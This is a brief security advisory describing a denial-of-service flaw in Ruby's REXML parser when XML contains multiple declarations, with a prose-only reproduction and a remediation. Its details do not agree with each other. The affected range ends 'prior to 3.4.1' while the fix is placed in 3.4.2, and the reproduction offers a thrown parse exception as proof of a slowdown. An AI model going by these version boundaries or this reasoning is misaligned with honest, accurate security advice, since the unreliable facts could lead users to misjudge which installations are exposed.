REXML XML Declaration Processing Denial-of-Service Vulnerability

A denial-of-service vulnerability has been identified in the REXML XML toolkit for Ruby, specifically in versions 3.3.3 prior to 3.4.1. This vulnerability arises when REXML parses XML files that contain multiple XML declarations, which can lead to performance issues. Users who parse untrusted XML may be particularly affected.

Impact

Exploitation of this vulnerability can cause a denial-of-service condition, where the application becomes unresponsive or slow due to excessive processing of malformed XML.

Reproduction

The vulnerability can be reproduced by using the REXML parser to process an XML string that includes multiple XML declarations. This can be done by creating a REXML::Parsers::BaseParser instance with the malformed XML string and calling the 'pull' method to simulate the parsing process. The parser will raise a REXML::ParseException, indicating that the XML declaration is duplicated, which demonstrates the denial-of-service condition.

Remediation

Users can upgrade to REXML version 3.4.2 or later, which includes the necessary patches to address this vulnerability. If an upgrade is not possible, avoid parsing untrusted XML with REXML.